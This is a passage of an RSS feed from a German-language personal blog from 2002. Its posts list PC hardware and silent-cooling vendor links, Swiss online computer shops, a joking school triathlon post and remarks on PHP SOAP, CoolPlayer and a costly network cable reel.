  15712. <a href="https://web.archive.org/web/20020905200200/http://www.seagate.com">http://www.seagate.com</a><br>
  15713. <a href="https://web.archive.org/web/20020905200200/http://www.sony.de">http://www.sony.de</a><br>
  15714. <a href="https://web.archive.org/web/20020905200200/http://www.toshiba.de">http://www.toshiba.de</a><br>
  15715. <a href="https://web.archive.org/web/20020905200200/http://www.lge.de">http://www.lge.de</a><br>
  15716. <a href="https://web.archive.org/web/20020905200200/http://www.papst.de">http://www.papst.de</a><br>
  15717. <a href="https://web.archive.org/web/20020905200200/http://www.verax.de">http://www.verax.de</a><br>
  15718. <a href="https://web.archive.org/web/20020905200200/http://www.akasa.com.tw">http://www.akasa.com.tw</a><br>
  15719. <a href="https://web.archive.org/web/20020905200200/http://www.ystech.com.tw">http://www.ystech.com.tw</a><br>
  15720. <a href="https://web.archive.org/web/20020905200200/http://www.blacknoise.de">http://www.blacknoise.de</a><br>
  15721. <a href="https://web.archive.org/web/20020905200200/http://www.silentsystems.de">http://www.silentsystems.de</a><br>
  15722. <a href="https://web.archive.org/web/20020905200200/http://www.viatech.com">http://www.viatech.com</a><br>
  15723. <a href="https://web.archive.org/web/20020905200200/http://www.digitallogic.com">http://www.digitallogic.com</a><br>
  15724. <a href="https://web.archive.org/web/20020905200200/http://www.fujitsu-siemens.de">http://www.fujitsu-siemens.de</a><br>
  15725. <a href="https://web.archive.org/web/20020905200200/http://www.hewlett-packard.de">http://www.hewlett-packard.de</a><br>
  15726. <a href="https://web.archive.org/web/20020905200200/http://www.leo-computer.de">http://www.leo-computer.de</a><br>
  15727. <a href="https://web.archive.org/web/20020905200200/http://www.ley-ecd.de">http://www.ley-ecd.de</a><br>
  15728. <a href="https://web.archive.org/web/20020905200200/http://www.lintec.de">http://www.lintec.de</a><br>
  15729. <a href="https://web.archive.org/web/20020905200200/http://www.tarox.de">http://www.tarox.de</a><br>
  15730. <a href="https://web.archive.org/web/20020905200200/http://www.terra.de">http://www.terra.de</a><br>
  15731. <a href="https://web.archive.org/web/20020905200200/http://www.morex.com.tw">http://www.morex.com.tw</a><br>
  15732. <a href="https://web.archive.org/web/20020905200200/http://www.noisebuster.de">http://www.noisebuster.de</a><br>
  15733. <a href="https://web.archive.org/web/20020905200200/http://www.analogonline.de">http://www.analogonline.de</a><br>
  15734. <a href="https://web.archive.org/web/20020905200200/http://www.dobertgmbh.de">http://www.dobertgmbh.de</a><br>
  15735. <a href="https://web.archive.org/web/20020905200200/http://www.engelking-elektronik.de">http://www.engelking-elektronik.de</a><br>
  15736. <a href="https://web.archive.org/web/20020905200200/http://www.deltatronic.info">http://www.deltatronic.info</a><br>
  15737. <a href="https://web.archive.org/web/20020905200200/http://www.seasonic.com">http://www.seasonic.com</a><br>
  15738. <a href="https://web.archive.org/web/20020905200200/http://www.enermax.com.tw">http://www.enermax.com.tw</a><br>
  15739. <a href="https://web.archive.org/web/20020905200200/http://www.xelo.net">http://www.xelo.net</a><br>
  15740. <a href="https://web.archive.org/web/20020905200200/http://www.club-3d.de">http://www.club-3d.de</a><br>
  15741. <a href="https://web.archive.org/web/20020905200200/http://www.hightech.com.hk">http://www.hightech.com.hk</a><br>
  15742. <a href="https://web.archive.org/web/20020905200200/http://www.sapphiretech.com">http://www.sapphiretech.com</a><br>
  15743. <a href="https://web.archive.org/web/20020905200200/http://www.prolink.com.tw">http://www.prolink.com.tw</a><br>
  15744. <a href="https://web.archive.org/web/20020905200200/http://www.creative.com">http://www.creative.com</a><br>
  15745. <a href="https://web.archive.org/web/20020905200200/http://www.aopencom.de">http://www.aopencom.de</a><br>
  15746. <a href="https://web.archive.org/web/20020905200200/http://www.msi-technology.de">http://www.msi-technology.de</a><br>
  15747. <a href="https://web.archive.org/web/20020905200200/http://www.visiontek.com">http://www.visiontek.com</a><br>
  15748. <a href="https://web.archive.org/web/20020905200200/http://www.asuscom.de">http://www.asuscom.de</a><br>
  15749. ]]></description>
  15750.    <content:encoded><![CDATA[Da bei c't nicht direkt auf den entsprechenden Abschnitt gelinkt werden kann und ich die URLs noch länger aufheben will als bis zur nächsten c't Ausgabe, habe ich sie nun stinkfrech direkt aus dem Quelltext herauskopiert. :-)<br><br><a href="https://web.archive.org/web/20020905200200/http://www.carsten-buschmann.de/schallschutz/">http://www.carsten-buschmann.de/schallschutz/</a><br>
  15751. <a href="https://web.archive.org/web/20020905200200/http://12ghosts.com/de/silence/">http://12ghosts.com/de/silence/</a><br>
  15752. <a href="https://web.archive.org/web/20020905200200/http://haiko.de/kiste/">http://haiko.de/kiste/</a><br>
  15753. <a href="https://web.archive.org/web/20020905200200/http://www.noisecontrol.de">http://www.noisecontrol.de</a><br>
  15754. <a href="https://web.archive.org/web/20020905200200/http://www.alternate.de">http://www.alternate.de</a><br>
  15755. <a href="https://web.archive.org/web/20020905200200/http://www.aqua-computer.de">http://www.aqua-computer.de</a><br>
  15756. <a href="https://web.archive.org/web/20020905200200/http://www.avitos.de">http://www.avitos.de</a><br>
  15757. <a href="https://web.archive.org/web/20020905200200/http://www.blacknoise.com">http://www.blacknoise.com</a><br>
  15758. <a href="https://web.archive.org/web/20020905200200/http://www.chip-cooler.de">http://www.chip-cooler.de</a><br>
  15759. <a href="https://web.archive.org/web/20020905200200/http://www.comptronic.de">http://www.comptronic.de</a><br>
  15760. <a href="https://web.archive.org/web/20020905200200/http://www.extremcooling.de">http://www.extremcooling.de</a><br>
  15761. <a href="https://web.archive.org/web/20020905200200/http://www.frozen-silicon.de">http://www.frozen-silicon.de</a><br>
  15762. <a href="https://web.archive.org/web/20020905200200/http://www.pcsilent.de">http://www.pcsilent.de</a><br>
  15763. <a href="https://web.archive.org/web/20020905200200/http://www.hrt.de">http://www.hrt.de</a><br>
  15764. <a href="https://web.archive.org/web/20020905200200/http://www.intos.de">http://www.intos.de</a><br>
  15765. <a href="https://web.archive.org/web/20020905200200/http://www.lindenberger.de">http://www.lindenberger.de</a><br>
  15766. <a href="https://web.archive.org/web/20020905200200/http://www.listan.de">http://www.listan.de</a><br>
  15767. <a href="https://web.archive.org/web/20020905200200/http://www.madex.de">http://www.madex.de</a><br>
  15768. <a href="https://web.archive.org/web/20020905200200/http://www.maxbyte.de">http://www.maxbyte.de</a><br>
  15769. <a href="https://web.archive.org/web/20020905200200/http://www.oc-card.de">http://www.oc-card.de</a><br>
  15770. <a href="https://web.archive.org/web/20020905200200/http://www.overclockers.de">http://www.overclockers.de</a><br>
  15771. <a href="https://web.archive.org/web/20020905200200/http://www.pc-cooling.de">http://www.pc-cooling.de</a><br>
  15772. <a href="https://web.archive.org/web/20020905200200/http://www.smartcooler.de">http://www.smartcooler.de</a><br>
  15773. <a href="https://web.archive.org/web/20020905200200/http://www.watercool.de">http://www.watercool.de</a><br>
  15774. <a href="https://web.archive.org/web/20020905200200/http://www.watercooling.de">http://www.watercooling.de</a><br>
  15775. <a href="https://web.archive.org/web/20020905200200/http://www.multimediashop.de">http://www.multimediashop.de</a><br>
  15776. <a href="https://web.archive.org/web/20020905200200/http://www.matrox.com">http://www.matrox.com</a><br>
  15777. <a href="https://web.archive.org/web/20020905200200/http://www.videologic.de">http://www.videologic.de</a><br>
  15778. <a href="https://web.archive.org/web/20020905200200/http://www.elitegroup.de">http://www.elitegroup.de</a><br>
  15779. <a href="https://web.archive.org/web/20020905200200/http://www.gainward.de">http://www.gainward.de</a><br>
  15780. <a href="https://web.archive.org/web/20020905200200/http://www.cptech.com.tw">http://www.cptech.com.tw</a><br>
  15781. <a href="https://web.archive.org/web/20020905200200/http://www.connect3d.com">http://www.connect3d.com</a><br>
  15782. <a href="https://web.archive.org/web/20020905200200/http://www.pny.de">http://www.pny.de</a><br>
  15783. <a href="https://web.archive.org/web/20020905200200/http://www.sparkle.com.tw">http://www.sparkle.com.tw</a><br>
  15784. <a href="https://web.archive.org/web/20020905200200/http://www.maxtor.com">http://www.maxtor.com</a><br>
  15785. <a href="https://web.archive.org/web/20020905200200/http://www.samsung.de">http://www.samsung.de</a><br>
  15786. <a href="https://web.archive.org/web/20020905200200/http://www.seagate.com">http://www.seagate.com</a><br>
  15787. <a href="https://web.archive.org/web/20020905200200/http://www.sony.de">http://www.sony.de</a><br>
  15788. <a href="https://web.archive.org/web/20020905200200/http://www.toshiba.de">http://www.toshiba.de</a><br>
  15789. <a href="https://web.archive.org/web/20020905200200/http://www.lge.de">http://www.lge.de</a><br>
  15790. <a href="https://web.archive.org/web/20020905200200/http://www.papst.de">http://www.papst.de</a><br>
  15791. <a href="https://web.archive.org/web/20020905200200/http://www.verax.de">http://www.verax.de</a><br>
  15792. <a href="https://web.archive.org/web/20020905200200/http://www.akasa.com.tw">http://www.akasa.com.tw</a><br>
  15793. <a href="https://web.archive.org/web/20020905200200/http://www.ystech.com.tw">http://www.ystech.com.tw</a><br>
  15794. <a href="https://web.archive.org/web/20020905200200/http://www.blacknoise.de">http://www.blacknoise.de</a><br>
  15795. <a href="https://web.archive.org/web/20020905200200/http://www.silentsystems.de">http://www.silentsystems.de</a><br>
  15796. <a href="https://web.archive.org/web/20020905200200/http://www.viatech.com">http://www.viatech.com</a><br>
  15797. <a href="https://web.archive.org/web/20020905200200/http://www.digitallogic.com">http://www.digitallogic.com</a><br>
  15798. <a href="https://web.archive.org/web/20020905200200/http://www.fujitsu-siemens.de">http://www.fujitsu-siemens.de</a><br>
  15799. <a href="https://web.archive.org/web/20020905200200/http://www.hewlett-packard.de">http://www.hewlett-packard.de</a><br>
  15800. <a href="https://web.archive.org/web/20020905200200/http://www.leo-computer.de">http://www.leo-computer.de</a><br>
  15801. <a href="https://web.archive.org/web/20020905200200/http://www.ley-ecd.de">http://www.ley-ecd.de</a><br>
  15802. <a href="https://web.archive.org/web/20020905200200/http://www.lintec.de">http://www.lintec.de</a><br>
  15803. <a href="https://web.archive.org/web/20020905200200/http://www.tarox.de">http://www.tarox.de</a><br>
  15804. <a href="https://web.archive.org/web/20020905200200/http://www.terra.de">http://www.terra.de</a><br>
  15805. <a href="https://web.archive.org/web/20020905200200/http://www.morex.com.tw">http://www.morex.com.tw</a><br>
  15806. <a href="https://web.archive.org/web/20020905200200/http://www.noisebuster.de">http://www.noisebuster.de</a><br>
  15807. <a href="https://web.archive.org/web/20020905200200/http://www.analogonline.de">http://www.analogonline.de</a><br>
  15808. <a href="https://web.archive.org/web/20020905200200/http://www.dobertgmbh.de">http://www.dobertgmbh.de</a><br>
  15809. <a href="https://web.archive.org/web/20020905200200/http://www.engelking-elektronik.de">http://www.engelking-elektronik.de</a><br>
  15810. <a href="https://web.archive.org/web/20020905200200/http://www.deltatronic.info">http://www.deltatronic.info</a><br>
  15811. <a href="https://web.archive.org/web/20020905200200/http://www.seasonic.com">http://www.seasonic.com</a><br>
  15812. <a href="https://web.archive.org/web/20020905200200/http://www.enermax.com.tw">http://www.enermax.com.tw</a><br>
  15813. <a href="https://web.archive.org/web/20020905200200/http://www.xelo.net">http://www.xelo.net</a><br>
  15814. <a href="https://web.archive.org/web/20020905200200/http://www.club-3d.de">http://www.club-3d.de</a><br>
  15815. <a href="https://web.archive.org/web/20020905200200/http://www.hightech.com.hk">http://www.hightech.com.hk</a><br>
  15816. <a href="https://web.archive.org/web/20020905200200/http://www.sapphiretech.com">http://www.sapphiretech.com</a><br>
  15817. <a href="https://web.archive.org/web/20020905200200/http://www.prolink.com.tw">http://www.prolink.com.tw</a><br>
  15818. <a href="https://web.archive.org/web/20020905200200/http://www.creative.com">http://www.creative.com</a><br>
  15819. <a href="https://web.archive.org/web/20020905200200/http://www.aopencom.de">http://www.aopencom.de</a><br>
  15820. <a href="https://web.archive.org/web/20020905200200/http://www.msi-technology.de">http://www.msi-technology.de</a><br>
  15821. <a href="https://web.archive.org/web/20020905200200/http://www.visiontek.com">http://www.visiontek.com</a><br>
  15822. <a href="https://web.archive.org/web/20020905200200/http://www.asuscom.de">http://www.asuscom.de</a><br>
  15823. ]]></content:encoded>
  15824.  </item>
  15825.  
  15826.  <item>
  15827.    <title>Noch mehr E-Commerce ...</title>
  15828.    <link>https://blog.x-way.org/Tech/2002/09/05/Noch_mehr_E-Commerce_.html</link>
  15829.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=85</guid>
  15830.    <dc:creator>Andreas Jaggi</dc:creator>
  15831.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15832.    <pubDate>Thu, 05 Sep 2002 19:54:00 +0000</pubDate>
  15833.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  15834.    <description><![CDATA[Gestern, nach dem tödlichen Triathlon, welcher laut <a href="http://www.wissen.de/xt/default.do?MENUID=40,156,538%26MENUNAME=InfoContainer%26OCCURRENCEID=1093281.8115153.TM01-FullContent%26WissenID=PXeYQjbozYJpdEmhHxAlLCPPHiyy02FhNk6yf619gcukeU4hGOST%7C362060515226220668/182718477/6/7063/7063/7003/7003/7063/-1%7C-139281567292397194/182718475/6/7063/7063/7003/7003/7063/-1%7C1031247938958" target="_blank"><b>wissen.de</b></a> eine Extremsportart ist, hatte ich mir die aktuelle Ausgabe von <a href="http://www.heise.de/ct/" target="_blank"><b>c't</b></a> gekauft und musste feststellen, dass auf Seite 112 unten links eine ähnliche Liste von Online-Shops steht, wie ich <a href="http://www.waterwave.ch/weblog/detail.php?id=82" target="_blank"><b>hier eine</b></a> gemacht hatte. Eine kleine Recherche ergab dann, dass <a href="https://web.archive.org/web/20020802013001/http://www.heise.de/ct/urls/" target="_blank"><b>hier</b></a> sämtliche Links des Artikels aufgelistet sind. Viel Vergnügen beim Preisvergleich!
  15835. ]]></description>
  15836.    <content:encoded><![CDATA[Gestern, nach dem tödlichen Triathlon, welcher laut <a href="http://www.wissen.de/xt/default.do?MENUID=40,156,538%26MENUNAME=InfoContainer%26OCCURRENCEID=1093281.8115153.TM01-FullContent%26WissenID=PXeYQjbozYJpdEmhHxAlLCPPHiyy02FhNk6yf619gcukeU4hGOST%7C362060515226220668/182718477/6/7063/7063/7003/7003/7063/-1%7C-139281567292397194/182718475/6/7063/7063/7003/7003/7063/-1%7C1031247938958" target="_blank"><b>wissen.de</b></a> eine Extremsportart ist, hatte ich mir die aktuelle Ausgabe von <a href="http://www.heise.de/ct/" target="_blank"><b>c't</b></a> gekauft und musste feststellen, dass auf Seite 112 unten links eine ähnliche Liste von Online-Shops steht, wie ich <a href="http://www.waterwave.ch/weblog/detail.php?id=82" target="_blank"><b>hier eine</b></a> gemacht hatte. Eine kleine Recherche ergab dann, dass <a href="https://web.archive.org/web/20020802013001/http://www.heise.de/ct/urls/" target="_blank"><b>hier</b></a> sämtliche Links des Artikels aufgelistet sind. Viel Vergnügen beim Preisvergleich!
  15837. ]]></content:encoded>
  15838.  </item>
  15839.  
  15840.  <item>
  15841.    <title>Das blaue Wunder</title>
  15842.    <link>https://blog.x-way.org/Misc/2002/09/05/Das_blaue_Wunder.html</link>
  15843.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=84</guid>
  15844.    <dc:creator>Andreas Jaggi</dc:creator>
  15845.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15846.    <pubDate>Thu, 05 Sep 2002 19:32:00 +0000</pubDate>
  15847.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15848.    <description><![CDATA[Es zeugt IMHO von Qualität, wenn eine Wochenzeitung nicht nur folgende Themen beinhaltet:<br><br><a href="http://www.weltwoche.ch/ressort_bericht.asp?asset_id=3109&amp;category_id=60" target="_blank"><b>Amerikas Regierung redet vom Kampf gegen den Terror. In Wahrheit wird die Tragödie vom 11. September auch für knallharte Interessenpolitik genutzt.</b></a><br><br><a href="http://www.weltwoche.ch/ressort_bericht.asp?asset_id=3129&amp;category_id=62" target="_blank"><b>Der Friedensforscher Johan Galtung erklärt, warum Amerika im Kampf gegen das Böse bis zum Äussersten gehen wird und weshalb George W. Bush und Osama Bin Laden einander ähneln.</b></a><br><br><a href="http://www.weltwoche.ch/ressort_bericht.asp?asset_id=3104&amp;category_id=59" target="_blank"><b>Sie flüchten vor Armut, Unterdrückung und Willkür: Jährlich suchen rund 10000 russische Soldaten vor Ende der Dienstpflicht das Weite – oft mit Gewalt.</b></a><br><br>sondern auch Themen, die weltpolitisch keinen Einfluss haben wie z.B. dieses hier:<br><br><a href="http://www.weltwoche.ch/ressort_bericht.asp?asset_id=3114&amp;category_id=60" target="_blank"><b>Björk kommt von dort, Mick Jagger war schon dort, David Bowie möchte unbedingt hin. Islands Jugend hält trotzdem nichts von Reykjavík. Doch muss sie sich deswegen gleich die Seele aus dem Leib saufen?</b></a>
  15849. ]]></description>
  15850.    <content:encoded><![CDATA[Es zeugt IMHO von Qualität, wenn eine Wochenzeitung nicht nur folgende Themen beinhaltet:<br><br><a href="http://www.weltwoche.ch/ressort_bericht.asp?asset_id=3109&amp;category_id=60" target="_blank"><b>Amerikas Regierung redet vom Kampf gegen den Terror. In Wahrheit wird die Tragödie vom 11. September auch für knallharte Interessenpolitik genutzt.</b></a><br><br><a href="http://www.weltwoche.ch/ressort_bericht.asp?asset_id=3129&amp;category_id=62" target="_blank"><b>Der Friedensforscher Johan Galtung erklärt, warum Amerika im Kampf gegen das Böse bis zum Äussersten gehen wird und weshalb George W. Bush und Osama Bin Laden einander ähneln.</b></a><br><br><a href="http://www.weltwoche.ch/ressort_bericht.asp?asset_id=3104&amp;category_id=59" target="_blank"><b>Sie flüchten vor Armut, Unterdrückung und Willkür: Jährlich suchen rund 10000 russische Soldaten vor Ende der Dienstpflicht das Weite – oft mit Gewalt.</b></a><br><br>sondern auch Themen, die weltpolitisch keinen Einfluss haben wie z.B. dieses hier:<br><br><a href="http://www.weltwoche.ch/ressort_bericht.asp?asset_id=3114&amp;category_id=60" target="_blank"><b>Björk kommt von dort, Mick Jagger war schon dort, David Bowie möchte unbedingt hin. Islands Jugend hält trotzdem nichts von Reykjavík. Doch muss sie sich deswegen gleich die Seele aus dem Leib saufen?</b></a>
  15851. ]]></content:encoded>
  15852.  </item>
  15853.  
  15854.  <item>
  15855.    <title>Triathlon</title>
  15856.    <link>https://blog.x-way.org/School/2002/09/03/Triathlon.html</link>
  15857.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=83</guid>
  15858.    <dc:creator>Andreas Jaggi</dc:creator>
  15859.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15860.    <pubDate>Tue, 03 Sep 2002 23:27:00 +0000</pubDate>
  15861.    <category domain="https://blog.x-way.org/School">School</category>
  15862.    <description><![CDATA[Bevor ich elendlich daran zu Grunde gehen werde dürft ihr es auch noch erfahren:<br>Morgen ist Triathlon von der Prima meiner Schule. Mit den klassichen drei Disziplinen:<br><b>Ertrinken</b>, <b>LungeAusDemLeibRadeln</b> und <b>ZuTodeLaufen</b><br><br>Kondolenz-E-Mails bitte hierhin schicken: <a href="mailto:&#103;&#101;&#115;&#116;&#111;&#114;&#98;&#101;&#110;&#102;&#117;&#101;&#114;&#100;&#101;&#110;&#116;&#114;&#105;&#97;&#116;&#104;&#108;&#111;&#110;&#64;&#119;&#97;&#116;&#101;&#114;&#119;&#97;&#118;&#101;&#46;&#99;&#104;"><b>gestorbenfuerdentriathlon@waterwave.ch</b></a>
  15863. ]]></description>
  15864.    <content:encoded><![CDATA[Bevor ich elendlich daran zu Grunde gehen werde dürft ihr es auch noch erfahren:<br>Morgen ist Triathlon von der Prima meiner Schule. Mit den klassichen drei Disziplinen:<br><b>Ertrinken</b>, <b>LungeAusDemLeibRadeln</b> und <b>ZuTodeLaufen</b><br><br>Kondolenz-E-Mails bitte hierhin schicken: <a href="mailto:&#103;&#101;&#115;&#116;&#111;&#114;&#98;&#101;&#110;&#102;&#117;&#101;&#114;&#100;&#101;&#110;&#116;&#114;&#105;&#97;&#116;&#104;&#108;&#111;&#110;&#64;&#119;&#97;&#116;&#101;&#114;&#119;&#97;&#118;&#101;&#46;&#99;&#104;"><b>gestorbenfuerdentriathlon@waterwave.ch</b></a>
  15865. ]]></content:encoded>
  15866.  </item>
  15867.  
  15868.  <item>
  15869.    <title>Online-PC-Shops</title>
  15870.    <link>https://blog.x-way.org/Tech/2002/09/03/Online-PC-Shops.html</link>
  15871.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=82</guid>
  15872.    <dc:creator>Andreas Jaggi</dc:creator>
  15873.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15874.    <pubDate>Tue, 03 Sep 2002 22:45:00 +0000</pubDate>
  15875.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  15876.    <description><![CDATA[Hier eine Liste einiger Online-Shops für Computer und Zubehör:<br><br>(Reihenfolge ist rein zufällig gewählt, sagt also nichts über Qualität, Preis oder sonstige Bewertung aus!)<br><br><a href="https://web.archive.org/web/20020928122818/http://www.stegpc.ch/" target="_blank"><b>Steg Computer</b></a><br><a href="https://www.brack.ch/" target="_blank"><b>Brack Consulting Computersysteme</b></a><br><a href="https://web.archive.org/web/20060215102832/http://byte-line.ch/" target="_blank"><b>Byte-Line</b></a><br><a href="https://web.archive.org/web/20020923170545/www.topd.ch" target="_blank"><b>Top-D Computer Discount</b></a><br><a href="http://digitec.ch/" target="_blank"><b>digitec.ch</b></a><br><a href="http://www.listan.de" target="_blank"><b>LISTAN</b></a><br><a href="https://web.archive.org/web/20020926010347/http://www.arp-datacon.ch/" target="_blank"><b>ARP DATACON</b></a><br><br>Mit Brack, Steg und Arp Datacon habe ich persönlich schon gute Erfahrungen gemacht; Byte-Line wurde mir von einem Kollegen sehr empfohlen; Top-D habe ich heute erst entdeckt, hat aber IMHO relativ niedrige Preise; digitec scheint mir IMHO ein bisschen teuer soll aber ein grosses Sortiment haben; bei Listan werde ich mein neues Gehäuse kaufen, überzeugt vor allem durch die niedrigen Versandkosten.<br><br>Ergänzungen sind herzlichst willkommen :-)
  15877. ]]></description>
  15878.    <content:encoded><![CDATA[Hier eine Liste einiger Online-Shops für Computer und Zubehör:<br><br>(Reihenfolge ist rein zufällig gewählt, sagt also nichts über Qualität, Preis oder sonstige Bewertung aus!)<br><br><a href="https://web.archive.org/web/20020928122818/http://www.stegpc.ch/" target="_blank"><b>Steg Computer</b></a><br><a href="https://www.brack.ch/" target="_blank"><b>Brack Consulting Computersysteme</b></a><br><a href="https://web.archive.org/web/20060215102832/http://byte-line.ch/" target="_blank"><b>Byte-Line</b></a><br><a href="https://web.archive.org/web/20020923170545/www.topd.ch" target="_blank"><b>Top-D Computer Discount</b></a><br><a href="http://digitec.ch/" target="_blank"><b>digitec.ch</b></a><br><a href="http://www.listan.de" target="_blank"><b>LISTAN</b></a><br><a href="https://web.archive.org/web/20020926010347/http://www.arp-datacon.ch/" target="_blank"><b>ARP DATACON</b></a><br><br>Mit Brack, Steg und Arp Datacon habe ich persönlich schon gute Erfahrungen gemacht; Byte-Line wurde mir von einem Kollegen sehr empfohlen; Top-D habe ich heute erst entdeckt, hat aber IMHO relativ niedrige Preise; digitec scheint mir IMHO ein bisschen teuer soll aber ein grosses Sortiment haben; bei Listan werde ich mein neues Gehäuse kaufen, überzeugt vor allem durch die niedrigen Versandkosten.<br><br>Ergänzungen sind herzlichst willkommen :-)
  15879. ]]></content:encoded>
  15880.  </item>
  15881.  
  15882.  <item>
  15883.    <title>The Wonders of PHP SOAP</title>
  15884.    <link>https://blog.x-way.org/Coding/2002/09/03/The_Wonders_of_PHP_SOAP.html</link>
  15885.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=81</guid>
  15886.    <dc:creator>Andreas Jaggi</dc:creator>
  15887.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15888.    <pubDate>Tue, 03 Sep 2002 19:58:00 +0000</pubDate>
  15889.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  15890.    <description><![CDATA[Wenn der Autor <a href="https://web.archive.org/web/20050221191726/http://www.phpkitchen.com/article.php?story=20020527103340943" target="_blank"><b>dieses Artikels</b></a> die SOAP Extension für PHP releast und mein Hoster diese Extensions installiert, wird der <b>x-log</b> auch via SOAP erreichbar sein.<br>Aber bis dahin müsst ihr euch noch gedulden. Oder ich nehme mir mal richtig Zeit um mit einer SOAP Klasse Webservices zu programmieren und anzubieten. Vielleicht wirds dann auch etwas mit meinem PHP-GTK-Client für den <b>x-log</b> :-)
  15891. ]]></description>
  15892.    <content:encoded><![CDATA[Wenn der Autor <a href="https://web.archive.org/web/20050221191726/http://www.phpkitchen.com/article.php?story=20020527103340943" target="_blank"><b>dieses Artikels</b></a> die SOAP Extension für PHP releast und mein Hoster diese Extensions installiert, wird der <b>x-log</b> auch via SOAP erreichbar sein.<br>Aber bis dahin müsst ihr euch noch gedulden. Oder ich nehme mir mal richtig Zeit um mit einer SOAP Klasse Webservices zu programmieren und anzubieten. Vielleicht wirds dann auch etwas mit meinem PHP-GTK-Client für den <b>x-log</b> :-)
  15893. ]]></content:encoded>
  15894.  </item>
  15895.  
  15896.  <item>
  15897.    <title>deviantMAG</title>
  15898.    <link>https://blog.x-way.org/Webdesign/2002/09/03/deviantMAG.html</link>
  15899.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=80</guid>
  15900.    <dc:creator>Andreas Jaggi</dc:creator>
  15901.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15902.    <pubDate>Tue, 03 Sep 2002 11:26:00 +0000</pubDate>
  15903.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  15904.    <description><![CDATA[Eine <a href="http://www.deviantmag.com/" target="_blank"><b>Website</b></a> für Designer :-)<br>IMHO siehts noch ein bisschen nach "under construction" aus. Aber dennoch schon gute Inhalte wie z.B. ein Interview mit dem Designer von <a href="http://www.2advanced.com/" target="_blank"><b>2advanced.com</b></a>
  15905. ]]></description>
  15906.    <content:encoded><![CDATA[Eine <a href="http://www.deviantmag.com/" target="_blank"><b>Website</b></a> für Designer :-)<br>IMHO siehts noch ein bisschen nach "under construction" aus. Aber dennoch schon gute Inhalte wie z.B. ein Interview mit dem Designer von <a href="http://www.2advanced.com/" target="_blank"><b>2advanced.com</b></a>
  15907. ]]></content:encoded>
  15908.  </item>
  15909.  
  15910.  <item>
  15911.    <title>Die *Alternative* zu Wireless</title>
  15912.    <link>https://blog.x-way.org/Networking/2002/09/02/Die_Alternative_zu_Wireless.html</link>
  15913.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=79</guid>
  15914.    <dc:creator>Andreas Jaggi</dc:creator>
  15915.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15916.    <pubDate>Mon, 02 Sep 2002 23:43:00 +0000</pubDate>
  15917.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  15918.    <description><![CDATA[<br><img alt="Cat.5 Kabelrolle" src="https://blog.x-way.org/images/antiwireless.jpg" width="180" height="180"><br><br>Für alle, die sich nicht der Strahlung eines Wireless Netzwerks aussetzen wollen aber trotzdem draussen im Park arbeiten wollen, gibt es jetzt eine Alternative: <b>90m Cat.5 Kabelrolle mit integriertem 8-Port Switch</b><br>Erhältlich bei <a href="https://www.arp.ch/" target="_blank"><b>arp.ch</b></a> (Prod.Nr. 230791)<br><br>Jedoch ist der Preis mit <b>CHF 899.-</b> IMHO ein bisschen sehr hoch. Da ist ein Wireless-Netz nicht viel teurer, wenn nicht sogar billiger!
  15919. ]]></description>
  15920.    <content:encoded><![CDATA[<br><img alt="Cat.5 Kabelrolle" src="https://blog.x-way.org/images/antiwireless.jpg" width="180" height="180"><br><br>Für alle, die sich nicht der Strahlung eines Wireless Netzwerks aussetzen wollen aber trotzdem draussen im Park arbeiten wollen, gibt es jetzt eine Alternative: <b>90m Cat.5 Kabelrolle mit integriertem 8-Port Switch</b><br>Erhältlich bei <a href="https://www.arp.ch/" target="_blank"><b>arp.ch</b></a> (Prod.Nr. 230791)<br><br>Jedoch ist der Preis mit <b>CHF 899.-</b> IMHO ein bisschen sehr hoch. Da ist ein Wireless-Netz nicht viel teurer, wenn nicht sogar billiger!
  15921. ]]></content:encoded>
  15922.  </item>
  15923.  
  15924.  <item>
  15925.    <title>Really Cool!</title>
  15926.    <link>https://blog.x-way.org/Misc/2002/09/02/Really_Cool.html</link>
  15927.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=78</guid>
  15928.    <dc:creator>Andreas Jaggi</dc:creator>
  15929.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  15930.    <pubDate>Mon, 02 Sep 2002 00:49:00 +0000</pubDate>
  15931.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  15932.    <description><![CDATA[<br><img alt="Coolplayer" src="https://blog.x-way.org/images/coolplayer.gif" width="40" height="18"><br><br><a href="http://coolplayer.sourceforge.net/" target="_blank"><b>CoolPlayer</b></a> nennt sich dieser kleine Musicplayer. Mit entsprechenden Skins lässt er sich bis auf die oben sichtbare Grösse verkleinern und er ist erst noch GPL!
  15933. ]]></description>
  15934.    <content:encoded><![CDATA[<br><img alt="Coolplayer" src="https://blog.x-way.org/images/coolplayer.gif" width="40" height="18"><br><br><a href="http://coolplayer.sourceforge.net/" target="_blank"><b>CoolPlayer</b></a> nennt sich dieser kleine Musicplayer. Mit entsprechenden Skins lässt er sich bis auf die oben sichtbare Grösse verkleinern und er ist erst noch GPL!
  15935. ]]></content:encoded>
  15936.  </item>
  15937.  
  15938.  <item>
  15939.    <title>Scheiss IBM</title>
  15940.    <link>https://blog.x-way.org/Misc/2002/09/01/Scheiss_IBM.html</link>
